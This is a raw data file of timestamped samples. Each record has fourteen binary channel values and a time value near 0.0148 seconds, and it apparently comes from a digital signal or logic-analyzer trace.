0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775540e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4775560e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775588e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775592e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775612e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775636e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775660e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775684e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775692e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4775708e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775732e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4775756e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775784e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4775808e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775836e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4775860e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4775884e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775908e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775932e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4775956e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4775984e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776008e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4776036e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4776060e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4776084e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776092e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776108e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776132e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776156e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776184e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776208e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776236e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776260e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776284e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776308e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776332e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,1.4776336e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4776340e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4776356e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4776384e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776388e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776408e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4776436e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4776460e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4776484e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4776508e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4776532e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4776556e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4776584e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776588e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776608e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776636e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776660e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776684e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776708e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776732e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776756e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776784e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776808e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776836e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776860e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,1.4776884e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4776888e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4776908e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4776932e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776940e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4776956e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4776984e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777008e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777036e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777060e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,1.4777084e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4777088e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.4777108e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.4777132e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777140e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777156e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777184e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777208e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777236e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777260e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777284e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777308e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777332e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777356e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777384e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777408e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777436e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777460e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777484e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777508e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777532e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777556e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777584e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777608e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777636e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777660e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777684e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777708e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777732e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777756e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777784e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777808e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777836e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777860e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777884e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777908e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777932e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4777956e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4777984e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778008e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778036e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778060e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778084e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778108e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778132e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778156e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778184e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778208e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778236e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778260e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778284e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778308e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778332e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778356e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778384e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778408e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778436e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778460e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778484e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778508e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778532e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778556e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778584e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778608e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778636e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778660e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778684e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778708e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778732e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778756e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778784e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778808e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778836e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778860e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778884e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778908e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778932e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4778956e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4778984e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779008e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779036e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779060e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779084e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779108e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779132e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779156e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779184e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779208e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779236e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779260e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779284e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779308e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779332e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779356e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779384e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779408e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779436e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779460e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779484e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779508e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779532e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779556e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779584e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779608e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779636e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779660e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779684e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779708e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779732e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779756e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779784e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779808e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779836e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779860e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779884e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779908e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779932e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4779956e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4779984e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780008e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780036e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780060e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780084e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780108e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780132e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780156e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780184e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780208e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780236e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780260e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780284e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780308e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780332e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780356e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780384e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780408e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780436e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780460e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780484e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780508e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780532e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780556e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780580e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4780604e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4780628e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4905628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4905840e-02 1,0,0,0,0,0,0,0,0,0,0,1,0,1,1.4905860e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4905880e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.4906208e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4906236e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.4906284e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4906308e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.4906356e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,1.4906388e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,1,1.4906436e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4906460e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4906508e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4906532e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4906588e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4906608e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4906636e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4906660e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4906712e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4906736e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4906788e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4906812e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4906860e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4906884e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4906936e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4906964e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907012e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907036e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907084e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907112e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907132e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907156e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907184e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907208e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907260e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907284e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907332e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907356e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907408e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907436e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907484e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907508e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907532e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907556e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907584e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907608e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907660e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907684e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907732e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907756e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907808e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907836e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907884e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907908e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4907960e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4907984e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908036e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908060e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908084e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908108e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908132e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908156e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908184e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908208e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908236e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908260e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908284e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908308e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908332e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908356e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908384e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908408e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908436e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908460e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908508e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908532e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908584e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908608e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908660e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908684e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908732e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908756e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908812e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908836e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908860e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908884e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908908e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908932e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4908956e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4908984e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909008e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909036e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909060e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909084e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909108e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909132e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909184e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909208e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909236e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909260e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909284e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909308e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909332e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909356e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909384e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909408e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909436e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909460e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909484e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909508e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909532e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909556e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909584e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909608e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909636e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909660e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909684e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909708e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909732e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909756e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909784e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909808e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909836e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909860e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909884e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909908e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909932e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4909956e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4909984e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910008e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910060e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910084e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910108e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910132e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910156e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910184e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910208e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910236e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910260e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910284e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910308e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910332e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910356e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910384e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910408e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910436e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910460e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910484e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910532e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910556e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910612e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910636e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910660e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910684e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910708e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910732e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910756e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910784e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910808e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910836e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910884e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910908e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4910956e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4910984e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911036e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911060e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911108e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911132e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911184e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911208e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911236e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911260e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911284e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911308e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911332e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911356e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911384e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911408e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911436e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911460e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911484e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911508e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911532e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911556e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911584e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911608e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911660e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911684e-02 